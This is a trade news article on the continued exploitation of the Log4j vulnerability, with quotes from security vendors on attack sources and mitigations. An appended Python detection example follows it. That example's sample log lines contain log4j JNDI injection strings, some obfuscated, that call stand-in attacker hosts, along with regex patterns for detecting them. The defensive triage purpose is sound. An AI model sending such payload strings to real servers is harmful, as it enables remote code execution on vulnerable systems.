 Channel Futures

MSSP Insider

As Holidays Approach, Log4j Vulnerability Exploitations Continue Unabated

  • Written by Edward Gately
  • December 21, 2021
Datto has released a tool for MSPs to combat the log4j vulnerability.

As the holidays swiftly approach, cybercriminals continue to actively exploit the log4j vulnerability with distributed scans and attacks worldwide.

That’s according to Sophos, which released its latest log4j research on Tuesday.

Sean Gallagher is senior threat researcher at Sophos.

“Sophos continues to monitor scans for log4j vulnerabilities,” he said. “In the past with vulnerability scans and exploit attempts, we’ve seen big spikes and then significant dropoffs.”

In the case of log4j, Sophos hasn’t seen any drop-off, Gallagher said. Instead, there are scans and exploit attempts from a globally distributed infrastructure on a daily basis.

Sophos expects this high degree of activity to continue, he said. That’s due to the multi-faceted nature of the vulnerability and the large extent of patching required.

On Dec. 10, researchers discovered a zero-day exploit in the popular Java logging library log4j. It allows remote code execution (RCE) when the library logs a specially crafted string. Since then, additional vectors have been discovered.

Log4J Vulnerability Prompts Malicious Activity

“As indicated, in some cases, a request comes from an IP address in one geographic region, with embedded URLs for log4j that connect to servers elsewhere — sometimes multiple different servers,” Gallagher said. “And while some of this is benign testing or research by penetration testers and other security researchers, a larger portion is malicious.”

For example, Sophos telemetry shows 59% of the exploit attempts try to make log4j contact with internet addresses in India. More than 40% of the exploit attempts try to make log4j contact with internet addresses in the United States.

However, the exploit attempts themselves predominantly originate from China and Russia. And most are tied to cybercrime.

“One server in Russia, connected to the Kinsing cryptocoin-mining botnet, is responsible for more than 10% of the exploit attempts Sophos has seen – more than 33% of the traffic from that country,” Gallagher said.

A Pathway for Malware

Nigel Thorpe is technical director at SecureAge. He said the log4j vulnerability illustrates why organizations can’t just rely on cybersecurity training and tools that look for code, patterns and behavior that’s already known as malicious.

“After all, until recently everyone thought that log4j was just a neat way for services to log their actions,” he said. “Now we know that unpatched, log4j provides a way for cybercriminals to get their malware into systems.”

All the affected services run on servers that are tightly controlled, Thorpe said.

“Sure, their customers probably click on malicious links on a regular basis, but the servers themselves should be tightly wrapped up,” he said. “So why continue to try and identify the potentially infinite universe of malware when we know precisely what is authorized to run on these servers? Why not simply allow all the known, approved processes to execute, and block everything else?”

All malware has to execute so that it can achieve its aims, Thorpe said. That includes data theft, opening a backdoor or scrambling all data.

“And we know that all malware should be blocked,” he said. “So let’s put some simple, pragmatic controls in place. It’s like a bouncer at a club. You’re not on the list so you’re not coming in.”

Datto Helps MSPs Protect Themselves From Log4J Exploits

Datto is encouraging all MSPs to download a free script it has developed and made available on GitHub for any remote monitoring and management (RMM) solution. This endpoint assessment tool can enumerate potentially vulnerable systems, detect intrusion attempts, and inoculate Windows systems against log4j vulnerability attacks.

Within 24-48 hours of the log4j vulnerability’s disclosure, Datto declared its products safe for use. It then began sharing active threat intelligence with the MSP community about attacks it observed, to help MSPs understand the log4j threat and how it was being exploited.

The component created for Datto RMM has been adopted by almost 50% of all Datto RMM partners. That represents millions of endpoint scans by MSPs for vulnerabilities at SMB client sites.

Still Early Days With Log4J Vulnerability

Ryan Weeks is Datto’s CISO.

“It’s still early days with this threat,” he said. “There are no currently widely known cases of MSPs suffering attacks due to log4shell exploits on the log4j vulnerabilities. We know from threat intelligence sources and reporting that initial access brokers started to scan for vulnerable instances within the first 48-72 hours of the exploit being known. We also know that ransomware operators are operationalizing the exploit in their kits. I expect that we’ll start to see more ransomware attacks in the coming weeks and months that can be traced back to initial access via log4j exploit.”

There’s still ample time for MSPs to protect themselves, Weeks said.

“An exploited server at this stage can still be identified and responded to in a way that minimizes damage,” he said. “Assuming breach and building cyber resilience means we knew this day would come and we’ve built capabilities to respond to it. If there is a threat present on a vulnerable system, you can still evict them, recover the systems and prevent a worse outcome like full scale ransomware.”

MSPs should implement outbound network egress restrictions, Weeks said. That should both break the attack chain for log4shell, which depends on the vulnerable server connecting out to an attacker-controlled address, and disrupt potential command-and-control (C2) communications.
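As an added example (not Datto’s script or Sophos’ tooling) that ties the callback destinations Gallagher describes to the egress restriction Weeks recommends, the Python below scans constructed web-server log lines for log4j JNDI lookups, pulls out the host each one tries to make the server contact, and reports whether a default-deny egress allowlist would have stopped that connection. The log lines, the 10.0.0.0/8 allowlist and all function names are assumptions.

```python
# Added example (not Datto's or Sophos' code): detect JNDI lookups in constructed
# web log lines, extract the callback host, and check it against an egress allowlist.
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit

# Wrappers such as ${lower:j} or ${env:X:-j} hide the literal "jndi" token from a
# naive grep; each regex matches only the innermost lookup, so nesting unwinds one layer per pass.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)

def normalize(text):
    """Strip lookup wrappers until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _DEFAULT.sub(lambda m: m.group(1), _WRAPPER.sub(lambda m: m.group(1), text))
    return text

def extract_callbacks(line):
    """Return [(scheme, host)] for every JNDI lookup found in one log line."""
    return [(m.group(1).lower(), urlsplit(f"{m.group(1).lower()}://{m.group(2)}").hostname or "")
            for m in _JNDI.finditer(normalize(line))]

def egress_allowed(host, allowlist):
    """Default-deny egress: only listed CIDRs pass; hostnames are not resolved offline."""
    try:
        return any(ip_address(host) in net for net in allowlist)
    except ValueError:
        return False

def triage(log_text, allowlist):
    """One record per attempt: source IP, callback host, and whether egress filtering would stop it."""
    records = []
    for line in log_text.splitlines():
        for scheme, host in extract_callbacks(line):
            records.append({"src": line.split(" ", 1)[0], "scheme": scheme, "callback": host,
                            "blocked": not egress_allowed(host, allowlist)})
    return records

# Constructed sample access-log lines using RFC 5737 documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"
203.0.113.77 - - [21/Dec/2021:10:02:11 +0000] "GET /?x=${${lower:j}ndi:${lower:ldap}://192.0.2.9/x} HTTP/1.1" 400 0 "-" "curl/7.68"
203.0.113.78 - - [21/Dec/2021:10:03:00 +0000] "GET / HTTP/1.1" 200 10 "-" "${${env:NOEXIST:-j}ndi:rmi://10.0.0.25:1099/x}"
"""
ALLOWLIST = [ip_network("10.0.0.0/8")]  # assumed: only the internal subnet is reachable outbound
```

The third sample line calls back to an address inside the allowlist and is reported as not blocked, which is why egress restrictions complement patching rather than replace it.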
